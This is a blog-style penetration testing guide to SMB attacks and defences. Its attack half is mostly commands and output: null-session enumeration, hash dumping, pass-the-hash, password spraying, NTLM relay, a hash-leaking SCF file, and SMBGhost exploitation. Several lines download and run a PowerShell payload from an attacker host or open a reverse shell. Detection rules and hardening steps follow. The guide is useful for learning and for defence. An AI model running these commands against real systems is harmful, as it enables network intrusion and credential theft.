SMB protocol security attacks and exploitation techniques

SMB Protocol Security: From Enumeration to Exploitation

Comprehensive guide to SMB protocol attacks including null sessions, pass-the-hash, forced authentication, relay attacks, and SMBGhost vulnerability exploitation.

Dec 11, 2025
Updated Dec 11, 2025

Introduction

Server Message Block (SMB) is a network file sharing protocol that enables applications and users to access files, printers, and other resources on remote systems. Originally developed by IBM and later enhanced by Microsoft, SMB has become the backbone of Windows file sharing and is also implemented on Unix/Linux systems through Samba.

The SMB protocol operates on multiple layers and ports, creating a complex attack surface that penetration testers and red teams regularly target. Understanding SMB's architecture, common misconfigurations, and exploitation techniques is essential for both offensive security professionals and defenders.

SMB vulnerabilities and misconfigurations can provide effective initial access and lateral movement vectors in enterprise networks. From null session enumeration to sophisticated relay attacks, SMB exploitation techniques continue to evolve alongside security improvements.

Enterprise Network Gold Mine

SMB services are ubiquitous in corporate environments, making them prime targets for reconnaissance and exploitation. A single misconfigured SMB share or vulnerable SMB implementation can provide attackers with initial access, credential harvesting opportunities, or complete domain compromise.

Technical Background

SMB Protocol Evolution

SMB has evolved through several versions, each introducing new features and security improvements:

Version    Release   Operating Systems                Key Features
SMBv1      1984      Windows NT - 10 (deprecated)     Original implementation, numerous vulnerabilities
SMBv2      2006      Windows Vista+, Server 2008+     Performance improvements, reduced chattiness
SMB2.1     2010      Windows 7, Server 2008 R2        Large MTU support, client oplock leasing
SMB3.0     2012      Windows 8, Server 2012           SMB Direct (RDMA), multichannel, encryption
SMB3.1.1   2015      Windows 10, Server 2016+         Pre-authentication integrity, encryption improvements

Port Architecture

SMB operates across different ports depending on the implementation:

Port 445 (SMB over TCP/IP)

  • Direct SMB communication without NetBIOS layer
  • Modern Windows default configuration
  • Preferred target for most SMB attacks

Port 139 (SMB over NetBIOS)

  • Legacy SMB implementation requiring NetBIOS session service
  • Uses NBT (NetBIOS over TCP/IP)
  • Common on older systems and Samba implementations

Related Ports

  • Port 137: NetBIOS Name Service (UDP)
  • Port 138: NetBIOS Datagram Service (UDP)
  • Port 135: Microsoft RPC endpoint mapper (used with SMB/DCOM attacks)

Authentication Mechanisms

SMB supports multiple authentication protocols:

NTLMv1 (Legacy)

  • Vulnerable to rainbow table attacks
  • Deprecated but still encountered in legacy environments
  • Easy to crack offline

NTLMv2

  • Improved hash algorithm using HMAC-MD5
  • Current default on Windows systems
  • More resistant to cracking but still vulnerable to relay attacks

Kerberos

  • Preferred authentication for domain-joined systems
  • Mutual authentication between client and server
  • Resistant to relay attacks but vulnerable to other attacks (Kerberoasting, etc.)

Enumeration Techniques

Identifying SMB Services

Using Nmap

SMB Service Detection
# Basic SMB service detection
sudo nmap -p139,445 -sV -sC 10.10.11.45

# Comprehensive SMB enumeration
sudo nmap -p139,445 --script smb-protocols,smb-security-mode,smb-enum-shares,smb-enum-users 10.10.11.45

# Detect SMB version and signing configuration
sudo nmap -p445 --script smb2-security-mode,smb2-capabilities 10.10.11.45

# Check for known SMB vulnerabilities
sudo nmap -p445 --script smb-vuln* 10.10.11.45

Example output:

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-05-06T13:16:04
|_  start_date: N/A
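The "Message signing enabled but not required" line above comes from the SecurityMode field of the server's SMB2 NEGOTIATE response. As an added example (not code from the original post), the following Python parses that field and the dialect from a raw response and classifies the host the way a relay target list would; the response bytes are constructed inline rather than captured.

```python
import struct

# Dialect revisions from MS-SMB2, named as in the version table above
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
            0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}
SIGNING_ENABLED = 0x0001    # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002   # SMB2_NEGOTIATE_SIGNING_REQUIRED
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000


def parse_negotiate_response(data: bytes) -> dict:
    """Return dialect and signing flags from a raw SMB2 NEGOTIATE response
    (64-byte SMB2 header followed by the 65-byte negotiate body)."""
    if len(data) < SMB2_HEADER_LEN + 6 or data[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    command = struct.unpack_from("<H", data, 12)[0]   # Command field of the header
    flags = struct.unpack_from("<I", data, 16)[0]     # bit 0 set = server response
    if command != SMB2_NEGOTIATE or not flags & 0x1:
        raise ValueError("not a NEGOTIATE response")
    struct_size, sec_mode, dialect = struct.unpack_from("<HHH", data, SMB2_HEADER_LEN)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": DIALECTS.get(dialect, "unknown (0x%04x)" % dialect),
        "signing_enabled": bool(sec_mode & SIGNING_ENABLED),
        "signing_required": bool(sec_mode & SIGNING_REQUIRED),
    }


def relay_exposure(info: dict) -> str:
    """Classify a host by signing posture; only 'required' stops relaying."""
    if info["signing_required"]:
        return "signing required (not a relay target)"
    if info["signing_enabled"]:
        return "signing enabled but not required (relay target)"
    return "signing disabled (relay target)"


def build_sample_response(security_mode: int, dialect: int) -> bytes:
    """Constructed NEGOTIATE response for offline testing; not a capture."""
    header = (b"\xfeSMB"
              + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, SMB2_NEGOTIATE, 1, 0x1,
                            0, 0, 0, 0, 0)
              + b"\x00" * 16)                        # zeroed Signature
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0,
                       b"\x11" * 16, 0x7, 0x800000, 0x800000, 0x800000,
                       0, 0, 0, 0, 0)
    return header + body


if __name__ == "__main__":
    for mode, dialect in ((0x1, 0x0311), (0x3, 0x0302), (0x0, 0x0210)):
        info = parse_negotiate_response(build_sample_response(mode, dialect))
        print(info["dialect"], "->", relay_exposure(info))
```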

Using CrackMapExec

SMB Version and Signing Check
# Identify SMB version and signing status
crackmapexec smb 10.10.11.45

# Scan entire subnet
crackmapexec smb 10.10.11.0/24

# Check for SMB signing across network range
crackmapexec smb 10.10.11.0/24 --gen-relay-list relay-targets.txt

Null Session Enumeration

Null sessions allow unauthenticated access to enumerate domain information on misconfigured systems.

Using RPCClient

Null Session RPC Connection
# Connect with null session
rpcclient -U "" -N 10.10.11.45

# Enumerate users
rpcclient $> enumdomusers
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[svc-backup] rid:[0x641]
user:[svc-sql] rid:[0xa2b]

# Enumerate groups
rpcclient $> enumdomgroups
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Backup Operators] rid:[0x551]

# Query user details
rpcclient $> queryuser 0x641
        User Name   :   svc-backup
        Full Name   :   Backup Service Account
        Home Drive  :   \\srv01\home$\svc-backup
        Description :   Service account for backup operations

# Enumerate shares
rpcclient $> netshareenum
netname: IPC$
        remark: IPC Service (DEVSM)
        path:   C:\tmp
netname: backup
        remark: Backup Share
        path:   C:\backup

Using SMBClient

SMB Share Enumeration
# List shares with null session
smbclient -L //10.10.11.45 -N

# Connect to specific share
smbclient //10.10.11.45/backup -N

# Download all files recursively
smb> recurse ON
smb> prompt OFF
smb> mget *

Using Enum4Linux

# Comprehensive null session enumeration
enum4linux -a 10.10.11.45

# Target specific enumeration types
enum4linux -U -G -S 10.10.11.45  # Users, Groups, Shares

# Modern Python implementation
enum4linux-ng -A 10.10.11.45 -oY output.yaml

Using SMBMap

# Enumerate shares with permissions
smbmap -H 10.10.11.45

# Recursively list directories
smbmap -H 10.10.11.45 -r backup

# Download specific file
smbmap -H 10.10.11.45 --download 'backup\passwords.txt'

# Upload file to writable share
smbmap -H 10.10.11.45 --upload '/tmp/payload.exe' 'share\payload.exe'

Authenticated Enumeration

Using Valid Credentials

# CrackMapExec enumeration with credentials
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --shares
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --users
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --groups
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --loggedon-users

# SMBMap with credentials
smbmap -H 10.10.11.45 -u administrator -p 'Password123!' -d DOMAIN

# RPCClient with credentials
rpcclient -U 'DOMAIN/username%password' 10.10.11.45

Domain Enumeration via SMB

# Enumerate domain users via SMB
crackmapexec smb 10.10.11.45 -u user -p 'password' --users | tee users.txt

# Extract user list for password spraying
cat users.txt | grep -oP '(?<=DOMAIN\\).*?(?=\s)' > userlist.txt

# Enumerate logged-on users across subnet
crackmapexec smb 10.10.11.0/24 -u admin -p 'password' --loggedon-users

Exploitation Techniques

Null Session Attacks

Harvesting Information for Further Attacks

# Enumerate users for password spraying (keep only the bare username, without the brackets)
rpcclient -U "" -N 10.10.11.45 -c "enumdomusers" | grep -oP '(?<=user:\[)[^\]]+' > users.txt

# Enumerate password policy
rpcclient -U "" -N 10.10.11.45 -c "getdompwinfo"
min_password_length: 7
password_properties: 0x00000001
        DOMAIN_PASSWORD_COMPLEX

# Enumerate shares for sensitive data
enum4linux -S 10.10.11.45 | grep -i "mapping"

Accessing Sensitive Shares

# Access backup share
smbclient //10.10.11.45/backup -N
smb> ls
  .                                   D        0  Mon May  6 14:32:15 2026
  ..                                  D        0  Mon May  6 14:32:15 2026
  credentials.txt                     A      116  Mon May  6 08:43:19 2026
  database_backup.bak                 A  8388608  Mon May  6 07:12:33 2026

smb> get credentials.txt
getting file credentials.txt of size 116 as credentials.txt

Pass-the-Hash Attacks

Pass-the-Hash allows authentication using NTLM hashes instead of plaintext passwords, because the NTLM challenge-response only ever needs the NT hash, never the password itself.

Extracting NTLM Hashes

# Dump SAM hashes with CrackMapExec
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --sam

# Dump NTDS.dit from Domain Controller
crackmapexec smb 10.10.11.10 -u administrator -p 'Password123!' --ntds

# Using Impacket secretsdump
secretsdump.py DOMAIN/administrator:'Password123!'@10.10.11.45

Pass-the-Hash Execution

Pass-the-Hash Authentication
# Authenticate using NTLM hash
crackmapexec smb 10.10.11.45 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe'

# Execute commands with PTH
crackmapexec smb 10.10.11.45 -u administrator -H '2b576acbe6bcfda7294d6bd18041b8fe' -x 'whoami'

# PSExec with hash
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe administrator@10.10.11.45

# WMIExec with hash
impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe administrator@10.10.11.45

SMBClient with Hash

# Access shares using hash (the NT hash is passed in the password position and --pw-nt-hash tells smbclient to treat it as a hash)
smbclient //10.10.11.45/C$ -U 'administrator%2b576acbe6bcfda7294d6bd18041b8fe' --pw-nt-hash

# Using pth-toolkit
pth-smbclient //10.10.11.45/share -U administrator%aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe

Remote Code Execution via SMB

Using Impacket PsExec

# Standard execution
impacket-psexec DOMAIN/administrator:'Password123!'@10.10.11.45

# Upload and execute custom binary
impacket-psexec DOMAIN/administrator:'Password123!'@10.10.11.45 -c /tmp/payload.exe

# Execute specific command
impacket-psexec DOMAIN/administrator:'Password123!'@10.10.11.45 'ipconfig /all'

Using SMBExec

# SMBExec (no RemComSvc)
impacket-smbexec DOMAIN/administrator:'Password123!'@10.10.11.45

# Same method, authenticating with an NT hash instead of a password
impacket-smbexec -hashes :2b576acbe6bcfda7294d6bd18041b8fe administrator@10.10.11.45

Using WMIExec

# WMI-based execution
impacket-wmiexec DOMAIN/administrator:'Password123!'@10.10.11.45

# Silent execution
impacket-wmiexec -nooutput DOMAIN/administrator:'Password123!'@10.10.11.45 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.14.5/payload.ps1\")"'

Using CrackMapExec

# Execute command on single host
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' -x 'whoami'

# Execute PowerShell command
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' -X '$PSVersionTable'

# Execute across multiple hosts
crackmapexec smb 10.10.11.0/24 -u administrator -p 'Password123!' -x 'systeminfo' --exec-method smbexec

# Execute with specific method
crackmapexec smb 10.10.11.45 -u admin -p 'password' -x 'whoami' --exec-method atexec

Password Spraying

Preparing Username List

# Extract usernames from enumeration (CME prints DOMAIN\user; \K drops the prefix from the match)
crackmapexec smb 10.10.11.45 -u guest -p '' --users | grep -oP 'DOMAIN\\\K\S+' > users.txt

# Clean and format list
cat users.txt | tr '[:upper:]' '[:lower:]' | sort -u > userlist_clean.txt

Executing Password Spray

# Spray single password
crackmapexec smb 10.10.11.45 -u userlist.txt -p 'Spring2026!' --continue-on-success

# Spray domain accounts against the domain controller (no --local-auth, which would test local SAM accounts instead)
crackmapexec smb dc01.domain.local -u users.txt -p 'Password123!' --continue-on-success

# Check for common passwords (read line by line so passwords containing spaces stay intact)
while IFS= read -r pass; do
    echo "[*] Trying: $pass"
    crackmapexec smb 10.10.11.45 -u users.txt -p "$pass" --continue-on-success | grep '\[+\]'
    sleep 30  # Wait between attempts to avoid lockout
done < common_passwords.txt

Smart Spraying to Avoid Lockout

# Query password policy first
crackmapexec smb 10.10.11.45 -u guest -p '' --pass-pol

# Spray with awareness of lockout threshold
# Example: 5 attempts threshold, spray 3 passwords with 60-minute gaps
crackmapexec smb 10.10.11.45 -u users.txt -p 'Spring2026!' --continue-on-success
sleep 3600  # Wait 60 minutes
crackmapexec smb 10.10.11.45 -u users.txt -p 'Summer2026!' --continue-on-success

NTLM Relay Attacks

NTLM relay attacks exploit hosts that do not require SMB signing: a client's NTLM authentication is forwarded to such a host, and the attacker's session is then authenticated as that client.

Identify Targets Without SMB Signing

# Scan for targets without SMB signing
crackmapexec smb 10.10.11.0/24 --gen-relay-list relay-targets.txt

# Verify specific target
nmap -p445 --script smb2-security-mode 10.10.11.45

Configure Responder

# Disable SMB and HTTP servers in Responder (for relay)
vim /etc/responder/Responder.conf

# Set to Off:
SMB = Off
HTTP = Off

# Start Responder
sudo responder -I eth0 -wv

Setup ntlmrelayx

# Basic relay to single target
impacket-ntlmrelayx -tf relay-targets.txt -smb2support

# Relay with command execution
impacket-ntlmrelayx -tf targets.txt -smb2support -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.14.5/payload.ps1\")"'

# Relay to dump SAM database
impacket-ntlmrelayx -tf targets.txt -smb2support

# Interactive shell
impacket-ntlmrelayx -tf targets.txt -smb2support -i

# SOCKS proxy for tunneling
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

Trigger Authentication

# Social engineering (phishing link)
file://10.10.14.5/share/document.pdf

# Forced authentication via various protocols
# Via SMB
smbclient //victim-ip/share

# Via HTTP (if HTTP server enabled in Responder)
http://victim-ip/

# Via email with UNC path
\\10.10.14.5\share\image.jpg

Catch and Relay

[*] SMBD-Thread-3: Connection from DOMAIN/USERNAME@10.10.11.45 controlled, attacking target smb://10.10.11.50
[*] Authenticating against smb://10.10.11.50 as DOMAIN/USERNAME SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Forced Authentication Attacks

Capturing NetNTLMv2 Hashes with Responder

# Start Responder on interface
sudo responder -I tun0 -wv

# Wait for authentication attempts from:
# - Name resolution failures
# - Mistyped UNC paths
# - Malicious file shares
# - Compromised web applications loading resources

# Example captured hash:
[SMB] NTLMv2-SSP Client   : 10.10.11.45
[SMB] NTLMv2-SSP Username : DOMAIN\username
[SMB] NTLMv2-SSP Hash     : username::DOMAIN:1122334455667788:9A8B7C6D5E4F3A2B1C0D9E8F7A6B5C4D:0101000000000000...

Cracking Captured Hashes

# Save hash to file
echo 'username::DOMAIN:1122334455667788:9A8B7C6D5E4F3A2B1C0D9E8F7A6B5C4D:...' > hash.txt

# Crack with Hashcat
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

# Crack with John the Ripper
john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Creating Malicious File Shares for Authentication Capture

# Create malicious SCF file
cat > @exploit.scf << 'EOF'
[Shell]
Command=2
IconFile=\\10.10.14.5\share\icon.ico
[Taskbar]
Command=ToggleDesktop
EOF

# Upload to SMB share
smbclient //10.10.11.45/public -U username%password
smb> put @exploit.scf

When users browse the share in Explorer, Windows automatically attempts to authenticate to the UNC path in IconFile in order to render the icon, which leaks a NetNTLMv2 response to the listener.

SMBGhost (CVE-2020-0796)

SMBGhost is a critical vulnerability in the SMBv3.1.1 compression mechanism, affecting Windows 10 versions 1903 and 1909 and Windows Server versions 1903 and 1909.

Vulnerability Check

# Using Nmap NSE script
nmap -p445 --script smb-vuln-cve-2020-0796 10.10.11.45

# Metasploit auxiliary module: note that smb_ms17_010 checks MS17-010 (EternalBlue), a separate SMBv1 flaw,
# not CVE-2020-0796; run it alongside the SMBGhost checks, not as a substitute for them
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.10.11.45
run

# Manual check with SMBv3 packet
python3 cve-2020-0796-check.py 10.10.11.45

Exploitation

# Using public exploit
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git
cd SMBGhost_RCE_PoC

# Configure exploit
python3 exploit.py -ip 10.10.11.45 -c "C:\\temp\\payload.exe"

# Using Metasploit (if module available)
use exploit/windows/smb/cve_2020_0796_smbghost
set RHOSTS 10.10.11.45
set LHOST 10.10.14.5
set payload windows/x64/meterpreter/reverse_tcp
exploit

Detection and Monitoring

Network Detection

Signature-Based Detection

# Snort rule for SMBGhost
alert tcp any any -> any 445 (msg:"SMBGhost CVE-2020-0796 Compression Exploit"; content:"|fc534d42|"; depth:4; content:"|33000000|"; distance:8; within:4; sid:1000001;)

# Suricata rule for NTLM relay
alert smb any any -> any 445 (msg:"Possible NTLM Relay Attack"; flow:to_server,established; content:"NTLMSSP"; sid:1000002;)

Zeek/Bro Detection

# Zeek detection script: raise a notice when one source makes excessive SMB tree connects
@load base/frameworks/notice

redef enum Notice::Type += { SMB_Enumeration };

# Tree connects per source address; entries expire 5 minutes after creation
global tree_connects: table[addr] of count &default=0 &create_expire=5min;

event smb2_tree_connect_request(c: connection, hdr: SMB2::Header, path: string)
{
    local src_ip = c$id$orig_h;
    ++tree_connects[src_ip];
    if (tree_connects[src_ip] == 100)   # fire once, when the threshold is crossed
        NOTICE([$note=SMB_Enumeration,
                $msg=fmt("Excessive SMB tree connects from %s", src_ip),
                $conn=c]);
}

Windows Event Log Monitoring

Event ID 4624: Account Logon

<QueryList>
  <Query Id="0" Path="Security">
    <Select Path="Security">
      *[System[(EventID=4624)]]
      and
      *[EventData[Data[@Name='LogonType']='3']]
      and
      *[EventData[Data[@Name='AuthenticationPackageName']='NTLM']]
    </Select>
  </Query>
</QueryList>

Event ID 5140: Network Share Access

# Monitor for unusual share access patterns (for 5140, ShareName is EventData index 7 and SubjectUserName index 1)
Get-WinEvent -FilterHashtable @{LogName='Security';ID=5140} |
    Where-Object {$_.Properties[7].Value -match '\\(C|ADMIN)\$$'} |
    Select-Object TimeCreated, @{N='User';E={$_.Properties[1].Value}}, @{N='Share';E={$_.Properties[7].Value}}

Event ID 4776: NTLM Authentication

Monitor for Pass-the-Hash attacks:

# Splunk query
index=windows EventCode=4776 Error_Code=0x0
| stats count by Source_Workstation, User_Name
| where count > 50

Behavioral Detection

Anomaly Detection Rules

# Sigma rule for SMB enumeration
title: Excessive SMB Share Enumeration
status: experimental
description: Detects potential SMB enumeration activity
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 5140
  timeframe: 5m
  condition: selection | count() by Computer > 100
level: medium
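As an added example (not code from the original post), the following Python implements the three detections above over constructed Security-log records: the Sigma rule's windowed 5140 count (keyed here on the source IpAddress rather than Computer, so that the source of the enumeration is what gets flagged), the Splunk 4776 aggregation, and the C$/ADMIN$ filter from the Get-WinEvent pipeline. The sample events and thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta


def _t(seconds):
    # Constructed timeline base for the sample records below
    return datetime(2026, 5, 6, 13, 0, 0) + timedelta(seconds=seconds)


# Constructed sample records (not real logs); field names follow the EventData
# of 5140 (network share accessed) and 4776 (NTLM credential validation).
SAMPLE_EVENTS = (
    # one workstation touching the backup share 120 times in four minutes
    [{"EventID": 5140, "time": _t(2 * i), "IpAddress": "10.10.11.200",
      "SubjectUserName": "svc-backup", "ShareName": r"\\*\backup"} for i in range(120)]
    # normal user activity spread over an hour
    + [{"EventID": 5140, "time": _t(600 * i), "IpAddress": "10.10.11.7",
        "SubjectUserName": "jdoe", "ShareName": r"\\*\public"} for i in range(6)]
    # admin-share access that the PowerShell filter above would surface
    + [{"EventID": 5140, "time": _t(900), "IpAddress": "10.10.11.200",
        "SubjectUserName": "administrator", "ShareName": r"\\*\ADMIN$"},
       {"EventID": 5140, "time": _t(901), "IpAddress": "10.10.11.200",
        "SubjectUserName": "administrator", "ShareName": r"\\*\C$"}]
    # 60 successful and 5 failed NTLM validations for one account from one host
    + [{"EventID": 4776, "time": _t(i), "Workstation": "WS-ATTACK",
        "TargetUserName": "administrator", "Status": "0x0"} for i in range(60)]
    + [{"EventID": 4776, "time": _t(i), "Workstation": "WS-ATTACK",
        "TargetUserName": "administrator", "Status": "0xc000006a"} for i in range(5)]
)


def detect_share_enumeration(events, threshold=100, window=timedelta(minutes=5)):
    """Sigma-rule logic: more than `threshold` 5140 events from one source
    address inside a sliding `window`. Returns the offending source addresses."""
    recent = defaultdict(deque)
    flagged = set()
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["EventID"] != 5140:
            continue
        q = recent[ev["IpAddress"]]
        q.append(ev["time"])
        while q and ev["time"] - q[0] > window:   # drop events outside the window
            q.popleft()
        if len(q) > threshold:
            flagged.add(ev["IpAddress"])
    return flagged


def detect_ntlm_burst(events, threshold=50):
    """Splunk-query logic: count successful 4776 validations per
    (Source_Workstation, User_Name) and keep the pairs above `threshold`."""
    counts = Counter((ev["Workstation"], ev["TargetUserName"])
                     for ev in events
                     if ev["EventID"] == 4776 and ev["Status"] == "0x0")
    return {pair: n for pair, n in counts.items() if n > threshold}


ADMIN_SHARE = re.compile(r"\\(C|ADMIN)\$$", re.IGNORECASE)


def admin_share_access(events):
    """Equivalent of the Get-WinEvent filter: 5140 events on C$ or ADMIN$."""
    return [(ev["time"], ev["SubjectUserName"], ev["ShareName"])
            for ev in events
            if ev["EventID"] == 5140 and ADMIN_SHARE.search(ev["ShareName"])]
```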

CrackMapExec Execution Detection

# Sysmon Event ID 1: Process Creation
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational';ID=1} |
    Where-Object {$_.Properties[4].Value -match 'crackmapexec|cme\.exe'} |
    Select-Object TimeCreated, @{N='CommandLine';E={$_.Properties[10].Value}}

Mitigation and Hardening

Disable SMBv1

# Check SMBv1 status
Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

# Disable SMBv1 (Windows 10/Server 2016+)
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart

# Disable via PowerShell (older systems)
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

# Disable via registry
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force

# Reboot required
Restart-Computer -Force

Enable SMB Signing

# Enable SMB signing (client)
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force

# Enable SMB signing (server)
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

# Verify configuration
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature, EnableSecuritySignature

Group Policy Configuration

Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options

- Microsoft network client: Digitally sign communications (always) = Enabled
- Microsoft network server: Digitally sign communications (always) = Enabled

Enable SMB Encryption

# Enable SMB encryption for all shares
Set-SmbServerConfiguration -EncryptData $true -Force

# Enable encryption for specific share
Set-SmbShare -Name "SensitiveData" -EncryptData $true

# Verify encryption status
Get-SmbShare | Select-Object Name, EncryptData

Restrict Anonymous Access

# Disable null session enumeration
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RestrictAnonymous" -Value 2

# Disable anonymous share enumeration
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RestrictNullSessAccess" -Value 1

# Remove Everyone from share permissions
# Review all shares for excessive permissions
Get-SmbShare | Get-SmbShareAccess

Network Segmentation

# Firewall rules to restrict SMB access (Linux iptables)
iptables -A INPUT -p tcp --dport 445 -s 10.10.11.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 445 -j DROP

# Windows Firewall rule
New-NetFirewallRule -DisplayName "Block SMB from Internet" -Direction Inbound -Protocol TCP -LocalPort 445 -RemoteAddress Internet -Action Block

# Block SMB at perimeter
# Configure edge firewall to drop TCP 445, 139, and UDP 137-138

Implement NTLM Restrictions

# Disable NTLM authentication domain-wide (Group Policy)
# Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
# Network security: Restrict NTLM: NTLM authentication in this domain = Deny all

# Audit NTLM usage before enforcing
# Network security: Restrict NTLM: Audit NTLM authentication in this domain = Enable all

# Monitor Event ID 8004 for NTLM usage
Get-WinEvent -LogName 'Microsoft-Windows-NTLM/Operational' |
    Where-Object {$_.Id -eq 8004}

Credential Protection

# Enable Credential Guard (Windows 10 Enterprise/Server 2016+)
# Requires UEFI, Secure Boot, and virtualization-based security

# Check if Credential Guard is enabled
Get-ComputerInfo | Select-Object DeviceGuardSecurityServicesConfigured

# Enable via Group Policy
# Computer Configuration > Administrative Templates > System > Device Guard
# Turn On Virtualization Based Security = Enabled
# Credential Guard Configuration = Enabled with UEFI lock

# Enable LSA Protection (PPL)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1

# Disable credential caching
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "CachedLogonsCount" -Value 0

Verification and Testing

Security Posture Assessment

# Scan for SMB vulnerabilities
nmap -p139,445 --script smb-vuln-* 10.10.11.0/24

# Test for null sessions
enum4linux -a 10.10.11.45 | grep -i "null session"

# Verify SMB signing
crackmapexec smb 10.10.11.0/24 --gen-relay-list vulnerable.txt

Compliance Checks

# Verify SMBv1 is disabled
Get-WindowsFeature FS-SMB1
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol

# Verify SMB signing is enabled
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature

# Verify SMB encryption is enabled for sensitive shares
Get-SmbShare | Where-Object {$_.Name -match 'Finance|HR|Executive'} | Select-Object Name, EncryptData

# Check anonymous access restrictions
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name RestrictAnonymous

Penetration Testing Checklist

  • Identify SMB services and versions (Nmap, CrackMapExec)
  • Test for null session access (RPCClient, Enum4Linux)
  • Enumerate users, groups, and shares
  • Test for common credential pairs (admin/admin, guest/)
  • Attempt password spraying with common passwords
  • Check for SMB signing disabled (relay attack potential)
  • Test NTLM relay attacks against identified targets
  • Deploy Responder for forced authentication capture
  • Test Pass-the-Hash with captured or dumped credentials
  • Attempt remote code execution via PSExec/WMIExec/SMBExec
  • Check for SMBGhost vulnerability (CVE-2020-0796)
  • Review share permissions for excessive access
  • Document all findings with risk ratings and remediation steps

Next Steps

If SMB vulnerabilities are identified during assessment:

  • Immediately disable SMBv1 across all Windows systems
  • Enable SMB signing (preferably required, not just enabled)
  • Implement SMB encryption for sensitive shares
  • Restrict anonymous access through registry and Group Policy
  • Deploy network segmentation to limit lateral SMB access
  • Enable comprehensive logging for Event IDs 4624, 4776, 5140, 5145
  • Conduct password audits to identify weak service account passwords

Takeaway: SMB protocol security remains a critical component of Windows network defense. The combination of disabling SMBv1, enforcing SMB signing, enabling encryption, restricting anonymous access, and comprehensive monitoring provides defense-in-depth against SMB-based attacks. SMB hardening should be a key component of your Windows security program given the protocol's prevalence and potential for abuse in enterprise environments.


SMB Protocol Security: From Enumeration to Exploitation | Drake Axelrod